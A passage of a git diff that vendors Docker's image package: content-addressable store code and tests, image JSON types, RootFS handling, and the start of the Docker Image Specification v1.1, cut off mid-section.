+// Delete removes content and metadata files associated with the digest.
+func (s *fs) Delete(dgst digest.Digest) error {
+	s.Lock()
+	defer s.Unlock()
+
+	if err := os.RemoveAll(s.metadataDir(dgst)); err != nil {
+		return err
+	}
+	if err := os.Remove(s.contentFile(dgst)); err != nil {
+		return err
+	}
+	return nil
+}
+
+// SetMetadata sets metadata for a given ID. It fails if there's no base file.
+func (s *fs) SetMetadata(dgst digest.Digest, key string, data []byte) error {
+	s.Lock()
+	defer s.Unlock()
+	if _, err := s.get(dgst); err != nil {
+		return err
+	}
+
+	baseDir := filepath.Join(s.metadataDir(dgst))
+	if err := os.MkdirAll(baseDir, 0700); err != nil {
+		return err
+	}
+	return ioutils.AtomicWriteFile(filepath.Join(s.metadataDir(dgst), key), data, 0600)
+}
+
+// GetMetadata returns metadata for a given digest.
+func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) {
+	s.RLock()
+	defer s.RUnlock()
+
+	if _, err := s.get(dgst); err != nil {
+		return nil, err
+	}
+	return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key))
+}
+
+// DeleteMetadata removes the metadata associated with a digest.
+func (s *fs) DeleteMetadata(dgst digest.Digest, key string) error {
+	s.Lock()
+	defer s.Unlock()
+
+	return os.RemoveAll(filepath.Join(s.metadataDir(dgst), key))
+}
diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go
new file mode 100644
index 0000000000..8d602d97eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/fs_test.go
@@ -0,0 +1,384 @@
+package image
+
+import (
+	"bytes"
+	"crypto/rand"
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+)
+
+func TestFSGetSet(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	testGetSet(t, fs)
+}
+
+func TestFSGetInvalidData(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id, err := fs.Set([]byte("foobar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	dgst := digest.Digest(id)
+
+	if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	_, err = fs.Get(id)
+	if err == nil {
+		t.Fatal("Expected get to fail after data modification.")
+	}
+}
+
+func TestFSInvalidSet(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id := digest.FromBytes([]byte("foobar"))
+	err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	_, err = fs.Set([]byte("foobar"))
+	if err == nil {
+		t.Fatal("Expecting error from invalid filesystem data.")
+	}
+}
+
+func TestFSInvalidRoot(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	tcases := []struct {
+		root, invalidFile string
+	}{
+		{"root", "root"},
+		{"root", "root/content"},
+		{"root", "root/metadata"},
+	}
+
+	for _, tc := range tcases {
+		root := filepath.Join(tmpdir, tc.root)
+		filePath := filepath.Join(tmpdir, tc.invalidFile)
+		err := os.MkdirAll(filepath.Dir(filePath), 0700)
+		if err != nil {
+			t.Fatal(err)
+		}
+		f, err := os.Create(filePath)
+		if err != nil {
+			t.Fatal(err)
+		}
+		f.Close()
+
+		_, err = NewFSStoreBackend(root)
+		if err == nil {
+			t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile)
+		}
+
+		os.RemoveAll(root)
+	}
+
+}
+
+func testMetadataGetSet(t *testing.T, store StoreBackend) {
+	id, err := store.Set([]byte("foo"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	id2, err := store.Set([]byte("bar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tcases := []struct {
+		id    digest.Digest
+		key   string
+		value []byte
+	}{
+		{id, "tkey", []byte("tval1")},
+		{id, "tkey2", []byte("tval2")},
+		{id2, "tkey", []byte("tval3")},
+	}
+
+	for _, tc := range tcases {
+		err = store.SetMetadata(tc.id, tc.key, tc.value)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		actual, err := store.GetMetadata(tc.id, tc.key)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if bytes.Compare(actual, tc.value) != 0 {
+			t.Fatalf("Metadata expected %q, got %q", tc.value, actual)
+		}
+	}
+
+	_, err = store.GetMetadata(id2, "tkey2")
+	if err == nil {
+		t.Fatal("Expected error for getting metadata for unknown key")
+	}
+
+	id3 := digest.FromBytes([]byte("baz"))
+	err = store.SetMetadata(id3, "tkey", []byte("tval"))
+	if err == nil {
+		t.Fatal("Expected error for setting metadata for unknown ID.")
+	}
+
+	_, err = store.GetMetadata(id3, "tkey")
+	if err == nil {
+		t.Fatal("Expected error for getting metadata for unknown ID.")
+	}
+}
+
+func TestFSMetadataGetSet(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	testMetadataGetSet(t, fs)
+}
+
+func TestFSDelete(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	testDelete(t, fs)
+}
+
+func TestFSWalker(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	testWalker(t, fs)
+}
+
+func TestFSInvalidWalker(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	fooID, err := fs.Set([]byte("foo"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	n := 0
+	err = fs.Walk(func(id digest.Digest) error {
+		if id != fooID {
+			t.Fatalf("Invalid walker ID %q, expected %q", id, fooID)
+		}
+		n++
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("Invalid data should not have caused walker error, got %v", err)
+	}
+	if n != 1 {
+		t.Fatalf("Expected 1 walk initialization, got %d", n)
+	}
+}
+
+func testGetSet(t *testing.T, store StoreBackend) {
+	type tcase struct {
+		input    []byte
+		expected digest.Digest
+	}
+	tcases := []tcase{
+		{[]byte("foobar"), digest.Digest("sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2")},
+	}
+
+	randomInput := make([]byte, 8*1024)
+	_, err := rand.Read(randomInput)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// skipping use of digest pkg because its used by the implementation
+	h := sha256.New()
+	_, err = h.Write(randomInput)
+	if err != nil {
+		t.Fatal(err)
+	}
+	tcases = append(tcases, tcase{
+		input:    randomInput,
+		expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))),
+	})
+
+	for _, tc := range tcases {
+		id, err := store.Set([]byte(tc.input))
+		if err != nil {
+			t.Fatal(err)
+		}
+		if id != tc.expected {
+			t.Fatalf("Expected ID %q, got %q", tc.expected, id)
+		}
+	}
+
+	for _, emptyData := range [][]byte{nil, {}} {
+		_, err := store.Set(emptyData)
+		if err == nil {
+			t.Fatal("Expected error for nil input.")
+		}
+	}
+
+	for _, tc := range tcases {
+		data, err := store.Get(tc.expected)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if bytes.Compare(data, tc.input) != 0 {
+			t.Fatalf("Expected data %q, got %q", tc.input, data)
+		}
+	}
+
+	for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} {
+		_, err := store.Get(key)
+		if err == nil {
+			t.Fatalf("Expected error for ID %q.", key)
+		}
+	}
+
+}
+
+func testDelete(t *testing.T, store StoreBackend) {
+	id, err := store.Set([]byte("foo"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	id2, err := store.Set([]byte("bar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = store.Delete(id)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	_, err = store.Get(id)
+	if err == nil {
+		t.Fatalf("Expected getting deleted item %q to fail", id)
+	}
+	_, err = store.Get(id2)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = store.Delete(id2)
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = store.Get(id2)
+	if err == nil {
+		t.Fatalf("Expected getting deleted item %q to fail", id2)
+	}
+}
+
+func testWalker(t *testing.T, store StoreBackend) {
+	id, err := store.Set([]byte("foo"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	id2, err := store.Set([]byte("bar"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tcases := make(map[digest.Digest]struct{})
+	tcases[id] = struct{}{}
+	tcases[id2] = struct{}{}
+	n := 0
+	err = store.Walk(func(id digest.Digest) error {
+		delete(tcases, id)
+		n++
+		return nil
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != 2 {
+		t.Fatalf("Expected 2 walk initializations, got %d", n)
+	}
+	if len(tcases) != 0 {
+		t.Fatalf("Expected empty unwalked set, got %+v", tcases)
+	}
+
+	// stop on error
+	tcases = make(map[digest.Digest]struct{})
+	tcases[id] = struct{}{}
+	err = store.Walk(func(id digest.Digest) error {
+		return errors.New("")
+	})
+	if err == nil {
+		t.Fatalf("Exected error from walker.")
+	}
+}
diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go
new file mode 100644
index 0000000000..29a990a556
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/image.go
@@ -0,0 +1,150 @@
+package image
+
+import (
+	"encoding/json"
+	"errors"
+	"io"
+	"time"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types/container"
+)
+
+// ID is the content-addressable ID of an image.
+type ID digest.Digest
+
+func (id ID) String() string {
+	return id.Digest().String()
+}
+
+// Digest converts ID into a digest
+func (id ID) Digest() digest.Digest {
+	return digest.Digest(id)
+}
+
+// IDFromDigest creates an ID from a digest
+func IDFromDigest(digest digest.Digest) ID {
+	return ID(digest)
+}
+
+// V1Image stores the V1 image configuration.
+type V1Image struct {
+	// ID a unique 64 character identifier of the image
+	ID string `json:"id,omitempty"`
+	// Parent id of the image
+	Parent string `json:"parent,omitempty"`
+	// Comment user added comment
+	Comment string `json:"comment,omitempty"`
+	// Created timestamp when image was created
+	Created time.Time `json:"created"`
+	// Container is the id of the container used to commit
+	Container string `json:"container,omitempty"`
+	// ContainerConfig is the configuration of the container that is committed into the image
+	ContainerConfig container.Config `json:"container_config,omitempty"`
+	// DockerVersion specifies version on which image is built
+	DockerVersion string `json:"docker_version,omitempty"`
+	// Author of the image
+	Author string `json:"author,omitempty"`
+	// Config is the configuration of the container received from the client
+	Config *container.Config `json:"config,omitempty"`
+	// Architecture is the hardware that the image is build and runs on
+	Architecture string `json:"architecture,omitempty"`
+	// OS is the operating system used to build and run the image
+	OS string `json:"os,omitempty"`
+	// Size is the total size of the image including all layers it is composed of
+	Size int64 `json:",omitempty"`
+}
+
+// Image stores the image configuration
+type Image struct {
+	V1Image
+	Parent     ID        `json:"parent,omitempty"`
+	RootFS     *RootFS   `json:"rootfs,omitempty"`
+	History    []History `json:"history,omitempty"`
+	OSVersion  string    `json:"os.version,omitempty"`
+	OSFeatures []string  `json:"os.features,omitempty"`
+
+	// rawJSON caches the immutable JSON associated with this image.
+	rawJSON []byte
+
+	// computedID is the ID computed from the hash of the image config.
+	// Not to be confused with the legacy V1 ID in V1Image.
+	computedID ID
+}
+
+// RawJSON returns the immutable JSON associated with the image.
+func (img *Image) RawJSON() []byte {
+	return img.rawJSON
+}
+
+// ID returns the image's content-addressable ID.
+func (img *Image) ID() ID {
+	return img.computedID
+}
+
+// ImageID stringifies ID.
+func (img *Image) ImageID() string {
+	return img.ID().String()
+}
+
+// RunConfig returns the image's container config.
+func (img *Image) RunConfig() *container.Config {
+	return img.Config
+}
+
+// MarshalJSON serializes the image to JSON. It sorts the top-level keys so
+// that JSON that's been manipulated by a push/pull cycle with a legacy
+// registry won't end up with a different key order.
+func (img *Image) MarshalJSON() ([]byte, error) {
+	type MarshalImage Image
+
+	pass1, err := json.Marshal(MarshalImage(*img))
+	if err != nil {
+		return nil, err
+	}
+
+	var c map[string]*json.RawMessage
+	if err := json.Unmarshal(pass1, &c); err != nil {
+		return nil, err
+	}
+	return json.Marshal(c)
+}
+
+// History stores build commands that were used to create an image
+type History struct {
+	// Created timestamp for build point
+	Created time.Time `json:"created"`
+	// Author of the build point
+	Author string `json:"author,omitempty"`
+	// CreatedBy keeps the Dockerfile command used while building image.
+	CreatedBy string `json:"created_by,omitempty"`
+	// Comment is custom message set by the user when creating the image.
+	Comment string `json:"comment,omitempty"`
+	// EmptyLayer is set to true if this history item did not generate a
+	// layer. Otherwise, the history item is associated with the next
+	// layer in the RootFS section.
+	EmptyLayer bool `json:"empty_layer,omitempty"`
+}
+
+// Exporter provides interface for exporting and importing images
+type Exporter interface {
+	Load(io.ReadCloser, io.Writer, bool) error
+	// TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error
+	Save([]string, io.Writer) error
+}
+
+// NewFromJSON creates an Image configuration from json.
+func NewFromJSON(src []byte) (*Image, error) {
+	img := &Image{}
+
+	if err := json.Unmarshal(src, img); err != nil {
+		return nil, err
+	}
+	if img.RootFS == nil {
+		return nil, errors.New("Invalid image JSON, no RootFS key.")
+	}
+
+	img.rawJSON = src
+
+	return img, nil
+}
diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go
new file mode 100644
index 0000000000..525023b813
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/image_test.go
@@ -0,0 +1,59 @@
+package image
+
+import (
+	"encoding/json"
+	"sort"
+	"strings"
+	"testing"
+)
+
+const sampleImageJSON = `{
+	"architecture": "amd64",
+	"os": "linux",
+	"config": {},
+	"rootfs": {
+		"type": "layers",
+		"diff_ids": []
+	}
+}`
+
+func TestJSON(t *testing.T) {
+	img, err := NewFromJSON([]byte(sampleImageJSON))
+	if err != nil {
+		t.Fatal(err)
+	}
+	rawJSON := img.RawJSON()
+	if string(rawJSON) != sampleImageJSON {
+		t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", sampleImageJSON, rawJSON)
+	}
+}
+
+func TestInvalidJSON(t *testing.T) {
+	_, err := NewFromJSON([]byte("{}"))
+	if err == nil {
+		t.Fatal("Expected JSON parse error")
+	}
+}
+
+func TestMarshalKeyOrder(t *testing.T) {
+	b, err := json.Marshal(&Image{
+		V1Image: V1Image{
+			Comment:      "a",
+			Author:       "b",
+			Architecture: "c",
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedOrder := []string{"architecture", "author", "comment"}
+	var indexes []int
+	for _, k := range expectedOrder {
+		indexes = append(indexes, strings.Index(string(b), k))
+	}
+
+	if !sort.IntsAreSorted(indexes) {
+		t.Fatal("invalid key order in JSON: ", string(b))
+	}
+}
diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go
new file mode 100644
index 0000000000..7b24e3ed1e
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/rootfs.go
@@ -0,0 +1,44 @@
+package image
+
+import (
+	"runtime"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/layer"
+)
+
+// TypeLayers is used for RootFS.Type for filesystems organized into layers.
+const TypeLayers = "layers"
+
+// typeLayersWithBase is an older format used by Windows up to v1.12. We
+// explicitly handle this as an error case to ensure that a daemon which still
+// has an older image like this on disk can still start, even though the
+// image itself is not usable. See https://github.com/docker/docker/pull/25806.
+const typeLayersWithBase = "layers+base"
+
+// RootFS describes images root filesystem
+// This is currently a placeholder that only supports layers. In the future
+// this can be made into an interface that supports different implementations.
+type RootFS struct {
+	Type    string         `json:"type"`
+	DiffIDs []layer.DiffID `json:"diff_ids,omitempty"`
+}
+
+// NewRootFS returns empty RootFS struct
+func NewRootFS() *RootFS {
+	return &RootFS{Type: TypeLayers}
+}
+
+// Append appends a new diffID to rootfs
+func (r *RootFS) Append(id layer.DiffID) {
+	r.DiffIDs = append(r.DiffIDs, id)
+}
+
+// ChainID returns the ChainID for the top layer in RootFS.
+func (r *RootFS) ChainID() layer.ChainID {
+	if runtime.GOOS == "windows" && r.Type == typeLayersWithBase {
+		logrus.Warnf("Layer type is unsupported on this platform. DiffIDs: '%v'", r.DiffIDs)
+		return ""
+	}
+	return layer.CreateChainID(r.DiffIDs)
+}
diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md
new file mode 100644
index 0000000000..83f138011d
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/spec/v1.1.md
@@ -0,0 +1,637 @@
+# Docker Image Specification v1.1.0
+
+An *Image* is an ordered collection of root filesystem changes and the
+corresponding execution parameters for use within a container runtime. This
+specification outlines the format of these filesystem changes and corresponding
+parameters and describes how to create and use them for use with a container
+runtime and execution tool.
+
+This version of the image specification was adopted starting in Docker 1.10.
+
+## Terminology
+
+This specification uses the following terms:
+
+<dl>
+    <dt>
+        Layer
+    </dt>
+    <dd>
+        Images are composed of <i>layers</i>. Each layer is a set of filesystem
+        changes. Layers do not have configuration metadata such as environment
+        variables or default arguments - these are properties of the image as a
+        whole rather than any particular layer.
+    </dd>
+    <dt>
+        Image JSON
+    </dt>
+    <dd>
+        Each image has an associated JSON structure which describes some
+        basic information about the image such as date created, author, and the
+        ID of its parent image as well as execution/runtime configuration like
+        its entry point, default arguments, CPU/memory shares, networking, and
+        volumes. The JSON structure also references a cryptographic hash of
+        each layer used by the image, and provides history information for
+        those layers. This JSON is considered to be immutable, because changing
+        it would change the computed ImageID. Changing it means creating a new
+        derived image, instead of changing the existing image.
+    </dd>
+    <dt>
+        Image Filesystem Changeset
+    </dt>
+    <dd>
+        Each layer has an archive of the files which have been added, changed,
+        or deleted relative to its parent layer. Using a layer-based or union
+        filesystem such as AUFS, or by computing the diff from filesystem
+        snapshots, the filesystem changeset can be used to present a series of
+        image layers as if they were one cohesive filesystem.
+    </dd>
+    <dt>
+        Layer DiffID
+    </dt>
+    <dd>
+        Layers are referenced by cryptographic hashes of their serialized
+        representation. This is a SHA256 digest over the tar archive used to
+        transport the layer, represented as a hexadecimal encoding of 256 bits, e.g.,
+        <code>sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9</code>.
+        Layers must be packed and unpacked reproducibly to avoid changing the
+        layer ID, for example by using tar-split to save the tar headers. Note
+        that the digest used as the layer ID is taken over an uncompressed
+        version of the tar.
+    </dd>
+    <dt>
+        Layer ChainID
+    </dt>
+    <dd>
+        For convenience, it is sometimes useful to refer to a stack of layers
+        with a single identifier. This is called a <code>ChainID</code>. For a
+        single layer (or the layer at the bottom of a stack), the
+        <code>ChainID</code> is equal to the layer's <code>DiffID</code>.
+        Otherwise the <code>ChainID</code> is given by the formula:
+        <code>ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN))</code>.
+    </dd>
+    <dt>
+        ImageID <a name="id_desc"></a>
+    </dt>
+    <dd>
+        Each image's ID is given by the SHA256 hash of its configuration JSON. It is 
+        represented as a hexadecimal encoding of 256 bits, e.g.,
+        <code>sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9</code>.
+        Since the configuration JSON that gets hashed references hashes of each
+        layer in the image, this formulation of the ImageID makes images
+        content-addressable.
+    </dd>
+    <dt>
+        Tag
+    </dt>
+    <dd>
+        A tag serves to map a descriptive, user-given name to any single image
+        ID. Tag values are limited to the set of characters
+        <code>[a-zA-Z0-9_.-]</code>, except they may not start with a <code>.</code>
+        or <code>-</code> character. Tags are limited to 127 characters.
+    </dd>
+    <dt>
+        Repository
+    </dt>
+    <dd>
+        A collection of tags grouped under a common prefix (the name component
+        before <code>:</code>). For example, in an image tagged with the name
+        <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
+        component of the name. A repository name is made up of slash-separated
+        name components, optionally prefixed by a DNS hostname. The hostname
+        must follow comply with standard DNS rules, but may not contain
+        <code>_</code> characters. If a hostname is present, it may optionally
+        be followed by a port number in the format <code>:8080</code>.
+        Name components may contain lowercase characters, digits, and
+        separators. A separator is defined as a period, one or two underscores,
+        or one or more dashes. A name component may not start or end with
+        a separator.
+    </dd>
+</dl>
+
+## Image JSON Description
+
+Here is an example image JSON file:
+
+```
+{  
+    "created": "2015-10-31T22:22:56.015925234Z",
+    "author": "Alyssa P. Hacker &ltalyspdev@example.com&gt",
+    "architecture": "amd64",
+    "os": "linux",
+    "config": {
+        "User": "alice",
+        "Memory": 2048,
+        "MemorySwap": 4096,
+        "CpuShares": 8,
+        "ExposedPorts": {  
+            "8080/tcp": {}
+        },
+        "Env": [  
+            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+            "FOO=docker_is_a_really",
+            "BAR=great_tool_you_know"
+        ],
+        "Entrypoint": [
+            "/bin/my-app-binary"
+        ],
+        "Cmd": [
+            "--foreground",
+            "--config",
+            "/etc/my-app.d/default.cfg"
+        ],
+        "Volumes": {
+            "/var/job-result-data": {},
+            "/var/log/my-app-logs": {},
+        },
+        "WorkingDir": "/home/alice",
+    },
+    "rootfs": {
+      "diff_ids": [
+        "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+        "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
+      ],
+      "type": "layers"
+    },
+    "history": [
+      {
+        "created": "2015-10-31T22:22:54.690851953Z",
+        "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+      },
+      {
+        "created": "2015-10-31T22:22:55.613815829Z",
+        "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+        "empty_layer": true
+      }
+    ]
+}
+```
+
+Note that image JSON files produced by Docker don't contain formatting
+whitespace. It has been added to this example for clarity.
+
+### Image JSON Field Descriptions
+
+<dl>
+    <dt>
+        created <code>string</code>
+    </dt>
+    <dd>
+        ISO-8601 formatted combined date and time at which the image was
+        created.
+    </dd>
+    <dt>
+        author <code>string</code>
+    </dt>
+    <dd>
+        Gives the name and/or email address of the person or entity which
+        created and is responsible for maintaining the image.
+    </dd>
+    <dt>
+        architecture <code>string</code>
+    </dt>
+    <dd>
+        The CPU architecture which the binaries in this image are built to run
+        on. Possible values include:
+        <ul>
+            <li>386</li>
+            <li>amd64</li>
+            <li>arm</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        os <code>string</code>
+    </dt>
+    <dd>
+        The name of the operating system which the image is built to run on.
+        Possible values include:
+        <ul>
+            <li>darwin</li>
+            <li>freebsd</li>
+            <li>linux</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        config <code>struct</code>
+    </dt>
+    <dd>
+        The execution parameters which should be used as a base when running a
+        container using the image. This field can be <code>null</code>, in
+        which case any execution parameters should be specified at creation of
+        the container.
+
+        <h4>Container RunConfig Field Descriptions</h4>
+
+        <dl>
+            <dt>
+                User <code>string</code>
+            </dt>
+            <dd>
+                <p>The username or UID which the process in the container should
+                run as. This acts as a default value to use when the value is
+                not specified when creating a container.</p>
+
+                <p>All of the following are valid:</p>
+
+                <ul>
+                    <li><code>user</code></li>
+                    <li><code>uid</code></li>
+                    <li><code>user:group</code></li>
+                    <li><code>uid:gid</code></li>
+                    <li><code>uid:group</code></li>
+                    <li><code>user:gid</code></li>
+                </ul>
+
+                <p>If <code>group</code>/<code>gid</code> is not specified, the
+                default group and supplementary groups of the given
+                <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
+                from the container are applied.</p>
+            </dd>
+            <dt>
+                Memory <code>integer</code>
+            </dt>
+            <dd>
+                Memory limit (in bytes). This acts as a default value to use
+                when the value is not specified when creating a container.
+            </dd>
+            <dt>
+                MemorySwap <code>integer</code>
+            </dt>
+            <dd>
+                Total memory usage (memory + swap); set to <code>-1</code> to
+                disable swap. This acts as a default value to use when the
+                value is not specified when creating a container.
+            </dd>
+            <dt>
+                CpuShares <code>integer</code>
+            </dt>
+            <dd>
+                CPU shares (relative weight vs. other containers). This acts as
+                a default value to use when the value is not specified when
+                creating a container.
+            </dd>
+            <dt>
+                ExposedPorts <code>struct</code>
+            </dt>
+            <dd>
+                A set of ports to expose from a container running this image.
+                This JSON structure value is unusual because it is a direct
+                JSON serialization of the Go type
+                <code>map[string]struct{}</code> and is represented in JSON as
+                an object mapping its keys to an empty object. Here is an
+                example:
+
+<pre>{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}</pre>
+
+                Its keys can be in the format of:
+                <ul>
+                    <li>
+                        <code>"port/tcp"</code>
+                    </li>
+                    <li>
+                        <code>"port/udp"</code>
+                    </li>
+                    <li>
+                        <code>"port"</code>
+                    </li>
+                </ul>
+                with the default protocol being <code>"tcp"</code> if not
+                specified.
+
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Env <code>array of strings</code>
+            </dt>
+            <dd>
+                Entries are in the format of <code>VARNAME="var value"</code>.
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Entrypoint <code>array of strings</code>
+            </dt>
+            <dd>
+                A list of arguments to use as the command to execute when the
+                container starts. This value acts as a  default and is replaced
+                by an entrypoint specified when creating a container.
+            </dd>
+            <dt>
+                Cmd <code>array of strings</code>
+            </dt>
+            <dd>
+                Default arguments to the entry point of the container. These
+                values act as defaults and are replaced with any specified when
+                creating a container. If an <code>Entrypoint</code> value is
+                not specified, then the first entry of the <code>Cmd</code>
+                array should be interpreted as the executable to run.
+            </dd>
+            <dt>
+                Volumes <code>struct</code>
+            </dt>
+            <dd>
+                A set of directories which should be created as data volumes in
+                a container running this image. This JSON structure value is
+                unusual because it is a direct JSON serialization of the Go
+                type <code>map[string]struct{}</code> and is represented in
+                JSON as an object mapping its keys to an empty object. Here is
+                an example:
+<pre>{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}</pre>
+            </dd>
+            <dt>
+                WorkingDir <code>string</code>
+            </dt>
+            <dd>
+                Sets the current working directory of the entry point process
+                in the container. This value acts as a default and is replaced
+                by a working directory specified when creating a container.
+            </dd>
+        </dl>
+    </dd>
+    <dt>
+        rootfs <code>struct</code>
+    </dt>
+    <dd>
+        The rootfs key references the layer content addresses used by the
+        image. This makes the image config hash depend on the filesystem hash.
+        rootfs has two subkeys:
+
+        <ul>
+          <li>
+            <code>type</code> is usually set to <code>layers</code>.
+          </li>
+          <li>
+            <code>diff_ids</code> is an array of layer content hashes (<code>DiffIDs</code>), in order from bottom-most to top-most.
+          </li>
+        </ul>
+
+
+        Here is an example rootfs section:
+
+<pre>"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}</pre>
+    </dd>
+    <dt>
+        history <code>struct</code>
+    </dt>
+    <dd>
+        <code>history</code> is an array of objects describing the history of
+        each layer. The array is ordered from bottom-most layer to top-most
+        layer. The object has the following fields.
+
+        <ul>
+          <li>
+            <code>created</code>: Creation time, expressed as a ISO-8601 formatted
+            combined date and time
+          </li>
+          <li>
+            <code>author</code>: The author of the build point
+          </li>
+          <li>
+            <code>created_by</code>: The command which created the layer
+          </li>
+          <li>
+            <code>comment</code>: A custom message set when creating the layer
+          </li>
+          <li>
+            <code>empty_layer</code>: This field is used to mark if the history
+            item created a filesystem diff. It is set to true if this history
+            item doesn't correspond to an actual layer in the rootfs section
+            (for example, a command like ENV which results in no change to the
+            filesystem).
+          </li>
+        </ul>
+
+Here is an example history section:
+
